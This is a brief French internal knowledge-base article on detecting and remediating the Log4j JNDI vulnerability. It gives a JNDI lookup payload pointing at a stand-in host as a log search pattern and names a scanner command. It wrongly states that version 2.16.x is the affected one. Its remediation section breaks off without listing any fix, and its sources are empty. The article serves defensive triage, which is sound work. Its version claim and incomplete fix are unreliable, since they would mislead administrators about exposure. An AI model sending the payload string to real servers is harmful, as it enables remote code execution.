KB - Cyber - Failles & correctifs

KB-Sécurité-Faille - LOG4J : scan et remédiation

Symptôme(s)

Pour voir si la faille a été exploitée, parcourir les logs java et chercher les lignes contenant les entrées suivantes :

{jndi:ldap://example.com:1234/callback}


Problème

La faille Log4J touche les version du pluggin 2.16.x

Elle permet a un hacker d’envoyer des jeux d’instruction à travers le service de logging et d’injecter des fichiers / exécuter du code sur la machine.

image.png


Solution

Sur les serveurs vulnérables, télécharger l’outils log4j-scaner correspodant à l’OS du serveur.

Télécharger l'outil :  logpresso / CVE-2021-44228-Scanner

Scanner l’ordinateur avec la commande :

log4j-scan --all-drives

image.png

image.png

Si des failles sont trouvées, deux solutions :


Sources